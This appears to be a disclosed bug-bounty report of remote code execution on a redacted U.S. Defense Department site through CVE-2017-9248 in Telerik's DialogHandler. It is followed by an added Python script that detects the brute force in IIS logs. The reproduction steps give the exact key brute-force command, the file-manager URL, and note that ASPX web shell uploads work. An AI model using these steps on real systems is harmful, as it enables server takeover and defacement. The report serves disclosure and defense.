hackeroneWarsongH1:491668
History: Feb 06, 2019 - 2:15 a.m.

U.S. Dept Of Defense: RCE on https://█████/ Using CVE-2017-9248

2019-02-06 02:15:44
warsong
hackerone.com
105

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 7.5 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.587 Medium
Percentile: 97.2%

Summary:
https://█████████/ is hosting an unpatched version of the Telerik DialogHandler Telerik.Web.UI.DialogHandler.aspx allowing for the machine key to be brute forced. The machine key can be used to access the DNN file manager to upload arbitrary files including ASPX giving a web shell and RCE.

Description:
Telerik has a known cryptographic weakness in older versions of the Dialog Handler which, when exploited, can be used to brute force the machine key and gain access to the DNN file manager. The file manager allows for ASPX shell upload and RCE.

Step-by-step Reproduction Instructions
Hit https://███/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx and notice the handler dialog message.
Download https://github.com/bao7uo/dp_crypto to make brute force simple and run:
python dp_crypto.py -k https://███████/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx 88 all 21

Wait for the script to finish and the key will be integrated into a link to the file manager for DNN.
You can use this link to upload arbitrary files to DNN. I uploaded a PNG for proof, but ASPX works just as well here. I had to do a little trial and error on this one: it uses the ASCII character set, and figuring out a key length of 88 took a little doing, but going longer than the real key causes the base64 to start validating again from the beginning, so in a test of 128 key length I was able to see the key repeat at the 89th position.

https://████████/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?DialogName=DocumentManager&renderMode=2&Skin=Default&Title=Document Manager&dpptn=&isRtl=false&dp=████

https://████/GSP.png

Product, Version, and Configuration (If applicable)
Telerik <= 2017.1.118

Suggested Mitigation/Remediation Actions
Patch Telerik or switch to a different editor like CKEditor.

Impact

Critical: Exploitation allows for a web shell, defacement, etc. through arbitrary unrestricted file uploads.
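The brute force described in the reproduction steps works one key character at a time, so on the server it shows up as a burst of requests to Telerik.Web.UI.DialogHandler.aspx from a single client with a changing dp parameter. The following detection script is an added example, not part of the HackerOne report or of the dp_crypto tool; it assumes an IIS W3C log restricted to the fields date, time, cs-uri-stem, cs-uri-query, c-ip and sc-status, and the window and threshold values are assumptions to tune per site. The log lines it runs over are constructed inline.

```python
"""Flag clients that hammer Telerik.Web.UI.DialogHandler.aspx in IIS W3C logs.

Added example, not the report's own code. A CVE-2017-9248 key brute force
produces many DialogHandler requests in a short window, each with a different
`dp` value; legitimate editor use opens the dialog only occasionally.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs

DIALOG_HANDLER = "telerik.web.ui.dialoghandler.aspx"  # matched case-insensitively

# Assumed field order: date time cs-uri-stem cs-uri-query c-ip sc-status
W3C_LINE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<ip>\S+) (?P<status>\d{3})$"
)


def parse_w3c(text):
    """Yield (timestamp, stem, query, ip, status); skip '#' directives and junk."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        m = W3C_LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{m['date']} {m['time']}", "%Y-%m-%d %H:%M:%S")
        query = "" if m["query"] == "-" else m["query"]  # IIS writes '-' for no query
        yield ts, m["stem"], query, m["ip"], int(m["status"])


def find_dialog_handler_bursts(text, window=timedelta(seconds=60), threshold=20):
    """Return {ip: (peak_requests_in_window, distinct_dp_values_in_that_window)}
    for every client exceeding `threshold` DialogHandler hits inside `window`."""
    per_ip = defaultdict(list)  # ip -> [(timestamp, dp value)]
    for ts, stem, query, ip, _status in parse_w3c(text):
        if not stem.lower().endswith(DIALOG_HANDLER):
            continue
        dp = parse_qs(query).get("dp", [""])[0]
        per_ip[ip].append((ts, dp))

    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding window over sorted timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            count = end - start + 1
            if count > threshold and count > flagged.get(ip, (0, 0))[0]:
                distinct = len({dp for _, dp in events[start:end + 1]})
                flagged[ip] = (count, distinct)
    return flagged


def constructed_log():
    """Constructed sample: sparse legitimate dialog use from one client and a
    40-request brute-force pattern with changing dp values from another."""
    stem = "/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx"
    base = datetime(2019, 2, 6, 2, 10, 0)
    lines = ["#Fields: date time cs-uri-stem cs-uri-query c-ip sc-status"]
    for i in range(3):  # three dialog opens spread over ten minutes
        ts = base + timedelta(minutes=5 * i)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} {stem} dp=legit{i} 203.0.113.7 200")
    for i in range(40):  # one request per second, new dp guess each time
        ts = base + timedelta(seconds=i)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} {stem} "
                     f"dp=guess{i:03d}&DialogName=DocumentManager 198.51.100.9 200")
    lines.append(f"{base:%Y-%m-%d %H:%M:%S} /Default.aspx - 198.51.100.9 200")
    return "\n".join(lines)


if __name__ == "__main__":
    for ip, (count, distinct) in find_dialog_handler_bursts(constructed_log()).items():
        print(f"{ip}: {count} DialogHandler requests in 60s, {distinct} distinct dp values")
```

A high count alone can come from a busy content team, so the distinct-dp figure is the discriminator: editors reuse the same encrypted dp blob, while a brute force never repeats one. Whatever the detection result, the fix the report gives still applies: an exposed DialogHandler.aspx on Telerik <= 2017.1.118 needs the patch or a different editor.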
